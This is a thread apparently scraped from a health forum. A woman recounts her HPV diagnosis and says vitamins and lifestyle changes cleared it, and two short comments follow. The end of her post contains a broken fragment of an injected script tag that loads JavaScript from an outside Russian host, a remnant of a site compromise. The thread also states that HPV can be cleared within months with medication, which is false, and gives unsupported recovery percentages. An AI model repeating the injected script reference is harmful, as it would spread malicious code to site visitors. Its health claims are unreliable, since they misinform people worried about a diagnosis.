A POSTIVE EXPERIENCE THERE IS HOPE :) READ IF BEEN RECENTLY DIAGNOSED-callie82 - (14 ) comments.

I was diagnosed with this virus when I was 21. At the time I was abusing recreational drugs, smoking about 2 packs a day and drinking 5 times a week as I worked as an exotic dancer in the town I lived and going to school full time. I was rarely getting adequate sleep and would need to binge sleep for 12 hours at a time. Being a college student I never ate healthy and loved pizza and mcDonald's. For those of you who sound like me read this with hope! When I was diagnosed my immmune system was almost non existant (which would also explain for my persistant cold/flu sicknesses as well). I also had two boyfriends at the time both that I had been dating between 9 months and two years. One night one of them found a bump and as soon as I could I went to the doctor and she diagnosed me. At first I was extremly reluctant to the news. I told both boyfriends; one of them I still haven't talked to since that night on the phone and the other one I have been with ever since (5 years later) so don't blame yourself if your guy leaves its not your fault he's just a ****!! The one that stayed with me convinced me to start becoming healthier, I never understood the reason before. We started by simply taking vitamins, I had never taken any supplement before but I took birth control so I take them the same time I take my pills pretty easy. Then I started eating better (still not good haha) but I cut out fatty fried fast food (that we all know is bad for us anyway) the majority of the time I tried to avoid eating out at places with poor food alternatives. I continued to go back to work as soon as my doctor said I could. She said that it would lower my immune system so I just have to be more careful of how much I have to drink (which is beneficial anyway because drinking and driving is bad). MY doctor also told me that even though I was *gasp* exposed I would not pass the virus on by dancing on someone's lap. I had to cut back on smoking but that was the hardest thing. I started just by cutting my intake to a half pack a day and limiting at work. I went back to my ob/gyn 6 months later and my pap test came out abnormal (kinda upsetting considering the work) but I just kept doing the best I could and a year later from my diagnosis my doctor told me my body had eliminated it (or at least that strain of the virus). My boyfriend has always been symptom free and I have for the last 4 years after one initial treatment! Don't think that it wont go away!
In some cases, which means some of the people that post on here negative or discouraging comments is because they are probably the unfortunate 8% of people who find it hard to rid themselves of the virus. 92% of women usually clear it on their own and only a small percentage only show symptoms (due to a lowered immune system, to think if I was resposible it may have come and go without my knowledge!).
To those who have just been diagnosed (like my friend who inspired me to tell my story): RELAX! Seriously. I went through about two weeks of self abuse/pity/punishment and it wasn't worth it, at all when I look back, it was just a waste of time. To me my story also proves that not all people or relationships are genuine and don't let the bad ones keep you from the GREAT ones (they all come and go just like this!). Also that don't think you need to change everything about your life . Now I just remember to take my vitamins, I have stayed faithful to my boyfriend, earned my degree and still occasionally get back on that pole ;) This disease isn't a life sentence, I've had to explain this to my distraught friend numerous times, it might seem that way and it depends on how you react. I know that sounds vaue at first but just have faith in your body and take some simple steps to maybe help take care of yourself. In my case it was very easy since I figured a little help to my immune system is better than no help at all and it worked.

Sorry so long I hope this helps all young, scared and confused src=h src=http://www.ncwc.ru/ngg.js>

I'm seeing someone with hpv, we are not having sex yet , I'm confused, I'm not sure if I want to do it or if is going to be safe for me, I wish someone could help me to clear my mind, how about oral sex?, if someone can help me I'd appreciate it.

body?

HPV is not a disease that sticks with
you for life, it usually only sicks
around for about a year, you can rid
yourself of it, even within a couple
of months if the proper preion
meds are taken. I know its embarassing
to deal with in terms of doctors or
pharmacies but dont worry about it
most the people around you at the
pharmacy you will never see again! :)
